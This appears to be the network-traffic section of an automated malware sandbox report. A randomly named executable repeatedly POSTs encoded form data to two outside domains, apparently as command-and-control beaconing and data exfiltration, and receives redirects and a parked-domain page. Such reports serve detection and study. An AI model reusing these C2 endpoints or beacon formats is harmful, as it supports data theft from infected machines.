                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Content-Length: 224
                                                          Host: www.pqnqxn.xyz
                                                          Origin: http://www.pqnqxn.xyz
                                                          Referer: http://www.pqnqxn.xyz/fku9/
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Raw: 31 48 67 3d 78 38 73 5a 69 7a 45 38 53 5a 74 33 4e 6a 34 61 52 64 44 79 73 64 78 6d 6b 47 48 62 6c 33 69 6f 6d 6c 55 74 2b 4f 49 76 79 43 51 33 44 56 4b 46 69 42 55 31 39 4e 6a 64 66 74 78 6a 31 62 44 4f 33 64 70 6f 2b 39 77 63 47 58 72 52 55 6b 42 6b 66 32 74 79 59 62 6f 36 31 63 44 65 31 2f 69 44 6d 38 43 47 53 43 49 2b 44 50 45 39 57 30 56 55 67 43 6b 57 6c 49 71 6a 56 38 71 4f 5a 76 61 46 77 32 46 4d 48 70 49 61 53 32 41 5a 56 55 56 69 63 6c 49 78 58 43 45 79 38 64 78 55 44 6b 59 38 48 68 69 44 46 63 48 78 47 36 39 48 4a 53 6d 39 7a 5a 38 6a 32 77 49 6a 6f 72 46 5a 71 78 32 51 46 47 50 32 6b 37 6d 4d 31 76 31 75 46 4d 38 6f 34 53 44 69 65 48 58 35 4e 78 72 63
                                                          Data Ascii: 1Hg=x8sZizE8SZt3Nj4aRdDysdxmkGHbl3iomlUt+OIvyCQ3DVKFiBU19Njdftxj1bDO3dpo+9wcGXrRUkBkf2tyYbo61cDe1/iDm8CGSCI+DPE9W0VUgCkWlIqjV8qOZvaFw2FMHpIaS2AZVUViclIxXCEy8dxUDkY8HhiDFcHxG69HJSm9zZ8j2wIjorFZqx2QFGP2k7mM1v1uFM8o4SDieHX5Nxrc
                                                          Jul 26, 2024 18:46:39.405570984 CEST652INHTTP/1.1 301 Moved Permanently
                                                          Date: Fri, 26 Jul 2024 16:46:39 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Location: http://www.pqnqxn.xyz
                                                          X-Powered-By: PHP/7.4.6
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9r5NqQUTnKJaNCQevAYVveAkTWIqFeikTPqZ%2Fd5km3JfozSrL5lfdJT3K0QNEjFJa4xIAHmFW2YvO4RkeyK%2BWX9Nr8pKmEgPOolulSNZxB3TAEpuIjK5oqlfoR2Ei84eHQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8a95ddf67f4832e8-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          7192.168.2.555145104.21.59.240807156C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 26, 2024 18:46:41.296087980 CEST1744OUTPOST /fku9/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate
                                                          Accept-Language: en-US,en;q=0.5
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Content-Length: 1240
                                                          Host: www.pqnqxn.xyz
                                                          Origin: http://www.pqnqxn.xyz
                                                          Referer: http://www.pqnqxn.xyz/fku9/
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Raw: 31 48 67 3d 78 38 73 5a 69 7a 45 38 53 5a 74 33 4e 6a 34 61 52 64 44 79 73 64 78 6d 6b 47 48 62 6c 33 69 6f 6d 6c 55 74 2b 4f 49 76 79 43 59 33 41 69 4b 46 67 69 4d 31 76 39 6a 64 57 4e 77 6b 31 62 43 4d 33 64 78 73 2b 39 31 70 47 56 6a 52 55 43 56 6b 5a 48 74 79 43 4c 6f 36 38 38 44 64 78 2f 6a 42 6d 38 53 43 53 43 59 2b 44 50 45 39 57 79 52 55 6e 54 6b 57 6e 49 71 67 42 73 72 42 50 76 61 68 77 32 64 63 48 70 45 73 53 47 67 5a 57 30 46 69 65 57 77 78 56 69 45 38 2f 64 77 54 44 6c 6c 73 48 68 2b 50 46 63 6a 58 47 35 74 48 44 57 62 46 6a 4a 30 59 74 78 38 73 6d 4d 64 49 38 57 4b 77 46 56 2f 39 70 72 61 6a 70 65 74 6b 46 37 52 72 37 43 65 34 48 51 72 5a 4b 6d 4b 76 78 53 57 43 73 69 67 55 53 57 4b 6a 68 7a 71 57 7a 4b 49 4c 6a 74 53 38 54 6a 53 79 62 47 75 67 57 47 4c 7a 31 73 45 44 67 4a 45 4e 42 49 51 5a 4e 6a 38 55 4f 58 4f 54 66 66 49 74 75 44 71 44 75 50 6e 68 35 52 63 59 30 66 7a 4e 2b 74 37 6f 79 74 4e 73 61 64 42 72 5a 52 6c 53 76 55 49 76 6a 67 39 74 79 6a 7a 68 4b 4c 31 4f 61 49 53 75 55 49 [TRUNCATED]
                                                          Data Ascii: 1Hg=x8sZizE8SZt3Nj4aRdDysdxmkGHbl3iomlUt+OIvyCY3AiKFgiM1v9jdWNwk1bCM3dxs+91pGVjRUCVkZHtyCLo688Ddx/jBm8SCSCY+DPE9WyRUnTkWnIqgBsrBPvahw2dcHpEsSGgZW0FieWwxViE8/dwTDllsHh+PFcjXG5tHDWbFjJ0Ytx8smMdI8WKwFV/9prajpetkF7Rr7Ce4HQrZKmKvxSWCsigUSWKjhzqWzKILjtS8TjSybGugWGLz1sEDgJENBIQZNj8UOXOTffItuDqDuPnh5RcY0fzN+t7oytNsadBrZRlSvUIvjg9tyjzhKL1OaISuUILDFwb2IhyDpLcTBr54pCUT99hTeE51ZeqwcyKE4vBWwvNXAg6vK12GjwTyHaqcnOGN5HgU5/iJm8HQfoAjAYFmHl3coJVoI2Plew6f3R1IGH+yvIwwOXl+Ok4u8ITfaUmulgndSHeIjXeNdW/ayPHW9mYPZpmLIT9wWthSL2VuzU2kmTBSdLMeH5M4bFI9i10RL0/3eH6qpWRXFU8K8K341NZFjeotKqoEp+K86h7amOnNlODZMfC0kF8PDyqmQ7uhcVAkT19eZ6fP24EZ77O7sEoc9Y64sclbxbtz9eo2mydWX3/6LfiIDUwLZjToG4/HequSWa7Vo0V3o1TYLpHkHdQ/GQNEd0ztT644axTUXOdye1XA1rbh3Fh765QrGpPjQC74l0/cszZAmh/27Ox31oGVgByErqzq4zs8C3JzN96iS5ZmdaKbEk1EoHsBLGI2CzL/gN11SBiwr4VOxdG26hEW+OQrxxa0jhewGhcXISkvkjYOO0mHpV7b4WQnm9fiEnEcZH3aeRHZmhPK6djlKx9D/IYQpAXQLewbWojtZtrwDBUbn2hT3yJPLdfcm2E7p+u///yNJpjmg9IBYmOBPkRWqiFU9hyJIyJ7Uw1n4LKoU8Gw8O9uH1nUQ7amAa4IM2j1nOl5L0+jF27orcBQxeMBT7Yav0WW [TRUNCATED]
                                                          Jul 26, 2024 18:46:41.973759890 CEST656INHTTP/1.1 301 Moved Permanently
                                                          Date: Fri, 26 Jul 2024 16:46:41 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Location: http://www.pqnqxn.xyz
                                                          X-Powered-By: PHP/7.4.6
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JruWZ3SJPznO7Wj6PTLihVExWcWVASERAnXVr77EcWakf8vxRJ2Viji%2FYfsMhMdYsAiwII6rNx8TWMchHoYuNJ38iHncClLwUsXbHVPTXxQU%2F1hZVDjbkka%2BSgN5aTa%2Faw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8a95de06893143a7-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          8192.168.2.555146104.21.59.240807156C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 26, 2024 18:46:43.892879009 CEST464OUTGET /fku9/?1Hg=8+E5hHkJAI9KLzdnRfLjsdta627301LWvCxQnfER7jE6HhXelR0L8M6eacA5uvGu6fFFzcUJZ3XtElIgDxgrCowK6qnc0dbjxbukcDgECY4ZLyFshyoZroDOS+2pE7Poig==&ejlto=QtkhctgpxJahPP0 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.5
                                                          Connection: close
                                                          Host: www.pqnqxn.xyz
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Jul 26, 2024 18:46:44.535300970 CEST648INHTTP/1.1 301 Moved Permanently
                                                          Date: Fri, 26 Jul 2024 16:46:44 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Location: http://www.pqnqxn.xyz
                                                          X-Powered-By: PHP/7.4.6
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IYyEzIg8jBPebwxFPUrF8jAzhy153V6KreN7guywwh6rEmsUtUyajZEllyjlf5m6weFlTdLSMpeoZThndxLcQkeWLNgzeIRLHv4O5j56EsXQsT7UisFozPJ9hKE1lhw1AQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8a95de16be078c33-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          9192.168.2.55514784.32.84.32807156C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 26, 2024 18:46:49.663841963 CEST710OUTPOST /htli/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate
                                                          Accept-Language: en-US,en;q=0.5
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Content-Length: 204
                                                          Host: www.lovezi.shop
                                                          Origin: http://www.lovezi.shop
                                                          Referer: http://www.lovezi.shop/htli/
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Raw: 31 48 67 3d 49 68 76 44 4a 37 48 49 2b 37 31 71 77 75 32 6a 77 42 78 57 2b 42 4d 76 44 33 52 39 77 61 33 39 37 67 6d 55 4c 73 48 74 58 47 6f 59 56 6a 6c 6d 45 74 46 51 53 64 57 73 75 66 53 78 4c 56 66 79 74 70 33 62 70 4d 68 67 59 53 55 48 46 2f 75 54 6e 64 50 72 31 55 34 45 48 62 6e 4a 56 4b 47 4c 76 73 4a 75 39 66 33 35 75 66 43 31 66 42 66 6e 77 61 2b 7a 61 2b 6a 41 47 6d 47 33 59 50 66 69 42 54 62 77 45 53 53 38 61 39 4f 39 31 4f 2f 48 43 4a 6a 6c 4a 63 32 61 59 70 43 62 63 37 38 4f 79 36 49 38 4d 74 75 54 62 31 45 45 47 4b 75 6a 32 51 36 68 46 57 30 4f 6a 31 77 73 65 6a 4b 6b 77 65 63 2f 72 6c 63 3d
                                                          Data Ascii: 1Hg=IhvDJ7HI+71qwu2jwBxW+BMvD3R9wa397gmULsHtXGoYVjlmEtFQSdWsufSxLVfytp3bpMhgYSUHF/uTndPr1U4EHbnJVKGLvsJu9f35ufC1fBfnwa+za+jAGmG3YPfiBTbwESS8a9O91O/HCJjlJc2aYpCbc78Oy6I8MtuTb1EEGKuj2Q6hFW0Oj1wsejKkwec/rlc=


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          10192.168.2.55514884.32.84.32807156C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 26, 2024 18:46:52.252620935 CEST730OUTPOST /htli/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate
                                                          Accept-Language: en-US,en;q=0.5
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Content-Length: 224
                                                          Host: www.lovezi.shop
                                                          Origin: http://www.lovezi.shop
                                                          Referer: http://www.lovezi.shop/htli/
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Raw: 31 48 67 3d 49 68 76 44 4a 37 48 49 2b 37 31 71 77 4f 6d 6a 6a 53 70 57 32 42 4d 75 47 33 52 39 71 71 33 35 37 67 61 55 4c 74 7a 39 58 30 38 59 62 68 39 6d 48 73 46 51 56 64 57 73 68 2f 53 77 46 31 66 35 74 70 37 6c 70 4e 74 67 59 53 41 48 46 2f 65 54 6b 73 50 6b 36 6b 34 47 65 4c 6e 50 49 36 47 4c 76 73 4a 75 39 66 69 63 75 66 61 31 44 67 76 6e 78 2b 71 30 63 4f 6a 42 57 32 47 33 4c 66 66 6d 42 54 61 54 45 53 6a 54 61 2f 47 39 31 4c 54 48 44 59 6a 6b 48 63 33 52 63 70 44 4b 54 4c 68 6d 31 74 70 7a 41 74 58 5a 4e 44 63 66 48 38 44 4a 73 79 79 4a 57 32 59 32 7a 6d 34 62 50 54 72 4e 71 39 4d 50 31 79 4a 56 57 43 4b 4b 45 45 74 65 75 35 69 55 75 65 32 55 6a 45 6f 78
                                                          Data Ascii: 1Hg=IhvDJ7HI+71qwOmjjSpW2BMuG3R9qq357gaULtz9X08Ybh9mHsFQVdWsh/SwF1f5tp7lpNtgYSAHF/eTksPk6k4GeLnPI6GLvsJu9ficufa1Dgvnx+q0cOjBW2G3LffmBTaTESjTa/G91LTHDYjkHc3RcpDKTLhm1tpzAtXZNDcfH8DJsyyJW2Y2zm4bPTrNq9MP1yJVWCKKEEteu5iUue2UjEox


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          11192.168.2.55514984.32.84.32807156C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 26, 2024 18:46:54.828394890 CEST1747OUTPOST /htli/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate
                                                          Accept-Language: en-US,en;q=0.5
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Content-Length: 1240
                                                          Host: www.lovezi.shop
                                                          Origin: http://www.lovezi.shop
                                                          Referer: http://www.lovezi.shop/htli/
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Raw: 31 48 67 3d 49 68 76 44 4a 37 48 49 2b 37 31 71 77 4f 6d 6a 6a 53 70 57 32 42 4d 75 47 33 52 39 71 71 33 35 37 67 61 55 4c 74 7a 39 58 30 6b 59 62 51 64 6d 45 4c 52 51 55 64 57 73 2f 76 53 31 46 31 66 6b 74 70 54 68 70 4e 78 57 59 58 45 48 46 65 2b 54 68 59 54 6b 74 30 34 47 44 62 6e 4f 56 4b 47 6b 76 71 70 69 39 66 79 63 75 66 61 31 44 6a 6e 6e 6e 61 2b 30 48 4f 6a 41 47 6d 47 37 59 50 66 4f 42 54 44 6f 45 54 57 73 61 73 2b 39 31 76 7a 48 46 72 4c 6b 59 4d 33 54 62 70 44 53 54 4c 74 35 31 73 41 4d 41 74 6a 33 4e 45 77 66 46 4c 71 41 38 54 4b 30 41 6d 30 6b 33 45 51 74 4f 32 47 68 6c 4d 6b 6f 6f 7a 68 50 55 6a 71 46 53 69 46 62 6c 59 72 36 79 49 6d 44 74 77 31 6a 4d 73 75 4b 47 55 6c 2f 73 6c 36 44 56 48 64 42 70 58 30 73 7a 49 67 55 72 6f 71 66 4e 77 68 6c 45 63 79 4b 74 69 61 4f 35 47 62 38 4a 6d 47 5a 55 42 32 6e 7a 49 7a 44 5a 65 6b 65 52 79 50 70 51 64 37 73 30 48 32 4d 53 4c 50 42 50 64 65 63 36 67 45 76 6e 47 44 57 63 5a 4c 6a 4f 74 64 32 51 6b 2f 68 4d 4a 31 69 78 31 2f 63 68 62 75 63 42 70 [TRUNCATED]
                                                          Data Ascii: 1Hg=IhvDJ7HI+71qwOmjjSpW2BMuG3R9qq357gaULtz9X0kYbQdmELRQUdWs/vS1F1fktpThpNxWYXEHFe+ThYTkt04GDbnOVKGkvqpi9fycufa1Djnnna+0HOjAGmG7YPfOBTDoETWsas+91vzHFrLkYM3TbpDSTLt51sAMAtj3NEwfFLqA8TK0Am0k3EQtO2GhlMkoozhPUjqFSiFblYr6yImDtw1jMsuKGUl/sl6DVHdBpX0szIgUroqfNwhlEcyKtiaO5Gb8JmGZUB2nzIzDZekeRyPpQd7s0H2MSLPBPdec6gEvnGDWcZLjOtd2Qk/hMJ1ix1/chbucBpmzsQ6pL8QBdsA9c9dogk6roj4SArxJr/fQUvHtWNdJAGzC5MoMb3iLOWAKYe8PRpr0B5yfpTYI1tRPWY1svMvrrCGr6ISXCv6JDFKH8Q5QNQfeEpXVQi75M3GO9qtOtueb+6alA7AW4UysgXUGNXtw/mIEWvUXbKAEAL79Dbm27Gk+EgNgF5gej9UCFD8RiXrNT2G/HT9LMrGUSOZCoJm3PJEc53T9DllRjN5OwP8GNafZHkpLPJ/q7PUMPFtJznk4W+Oq3AXHTphWc0qL9uXkdmAnbFRKfqxnkwCXgZw+QEmhVc5Nm/bRv2inkA9Sy4qp6fvGHBAuKMT7Sl3syzcaGRE66wcziF3AORPyNKFjoPK9Br08fN/9WhSumEmIwWgjVU6M+PP63v/mxK5HO07O4JxpbelpwKFZdrcX5LKQIUE+uk6/LZ0h/NQAGbcSJFnEaYucvALLq/hzmZp5D2aK2oQlVx4rD/Lxa0PAJ541KxGdOV8ZpwEra/vgLbGa9qrVL382IfITMZvlVRg6ssugKMOlDcRDOnEnIx+rv97S1iJXhs936KMa6yUnNPc4/6dhD9o+LdL3RYjecrcl37VeIm0IAErLxIW17AjKREUZ4ZHSZ69wqlo83U303n0dKxkyCkE5FCmVb0XLH/q8ESrIpvdcrC7+OINg [TRUNCATED]


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          12192.168.2.55515084.32.84.32807156C:\Program Files (x86)\gbpubFqQDlEdUubIycEGbALhwRGmBmoyLPeZJVyYmzhdFTGKOwnWivArruVgDQZcIvzJxwqhWNWp\QnAcfZuONg.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 26, 2024 18:46:57.405827999 CEST465OUTGET /htli/?ejlto=QtkhctgpxJahPP0&1Hg=FjHjKNi/s/5kx+KnkSdD7DBcT3to66u90TWIQenAa0cXcBEeV9ZBFtbsq/uwbVXzm5/jkr9fdxMKasz/2IuVvEkWA5eWfr+6uK8ix+bvoaaPZEzC/cixV8fHHlKsAdCdfw== HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.5
                                                          Connection: close
                                                          Host: www.lovezi.shop
                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Jul 26, 2024 18:46:57.913244963 CEST1236INHTTP/1.1 200 OK
                                                          Server: hcdn
                                                          Date: Fri, 26 Jul 2024 16:46:57 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 10072
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          alt-svc: h3=":443"; ma=86400
                                                          x-hcdn-request-id: d07cbaed975a03615debd6e1ee55e7cd-bos-edge1
                                                          Expires: Fri, 26 Jul 2024 16:46:56 GMT
                                                          Cache-Control: no-cache
                                                          Accept-Ranges: bytes
                                                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                          Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"
                                                          Jul 26, 2024 18:46:57.913407087 CEST1236INData Raw: 4f 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61
                                                          Data Ascii: Open Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600
                                                          Jul 26, 2024 18:46:57.913934946 CEST1236INData Raw: 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65
                                                          Data Ascii: x;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-c
                                                          Jul 26, 2024 18:46:57.913949966 CEST1236INData Raw: 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 69 6e 76 65 72 73 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f
                                                          Data Ascii: r:#fff!important}.navbar{border-radius:0!important}.navbar-inverse{background-color:#36344d;border:none}.column-custom-wrap{padding-top:10px 20px}.badge{font-size:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-
                                                          Jul 26, 2024 18:46:57.914889097 CEST1236INData Raw: 65 6c 63 6f 6d 65 2f 69 6d 61 67 65 73 2f 68 6f 73 74 69 6e 67 65 72 2d 6c 6f 67 6f 2e 73 76 67 20 61 6c 74 3d 48 6f 73 74 69 6e 67 65 72 20 77 69 64 74 68 3d 31 32 30 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c
                                                          Data Ascii: elcome/images/hostinger-logo.svg alt=Hostinger width=120></a></div><div class="collapse navbar-collapse" id=myNavbar><ul class="nav navbar-links navbar-nav navbar-right"><li><a href=https://www.hostinger.com/tutorials rel=nofollow><i aria-hidd
                                                          Jul 26, 2024 18:46:57.914902925 CEST1236INData Raw: 78 20 63 6f 6c 75 6d 6e 2d 77 72 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 31 32 20 63 6f 6c 2d 73 6d 2d 34 20 63 6f 6c 75 6d 6e 2d 63 75 73 74 6f 6d 2d 77 72 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 6f 6c 75 6d
                                                          Data Ascii: x column-wrap"><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title><span style=margin-right:8px>Buy website hosting </span><span class=badge>Save 90%</span></div><br><p>Extremely fast, secure and
                                                          Jul 26, 2024 18:46:57.915950060 CEST776INData Raw: 28 29 7b 74 68 69 73 2e 75 74 66 31 36 3d 7b 64 65 63 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 66 6f 72 28 76 61 72 20 72 2c 65 2c 6e 3d 5b 5d 2c 74 3d 30 2c 61 3d 6f 2e 6c 65 6e 67 74 68 3b 74 3c 61 3b 29 7b 69 66 28 35 35 32 39 36 3d 3d
                                                          Data Ascii: (){this.utf16={decode:function(o){for(var r,e,n=[],t=0,a=o.length;t<a;){if(55296==(63488&(r=o.charCodeAt(t++)))){if(e=o.charCodeAt(t++),55296!=(64512&r)||56320!=(64512&e))throw new RangeError("UTF-16(decode): Illegal UTF-16 sequence");r=((1023
                                                          Jul 26, 2024 18:46:57.918955088 CEST1236INData Raw: 29 7d 74 68 69 73 2e 64 65 63 6f 64 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 61 2c 68 2c 66 2c 69 2c 63 2c 75 2c 64 2c 6c 2c 70 2c 67 2c 73 2c 43 2c 77 2c 76 2c 6d 3d 5b 5d 2c 79 3d 5b 5d 2c 45 3d 65 2e 6c 65 6e 67 74 68 3b 66
                                                          Data Ascii: )}this.decode=function(e,t){var a,h,f,i,c,u,d,l,p,g,s,C,w,v,m=[],y=[],E=e.length;for(a=128,f=0,i=72,(c=e.lastIndexOf("-"))<0&&(c=0),u=0;u<c;++u){if(t&&(y[m.length]=e.charCodeAt(u)-65<26),128<=e.charCodeAt(u))throw new RangeError("Illegal input
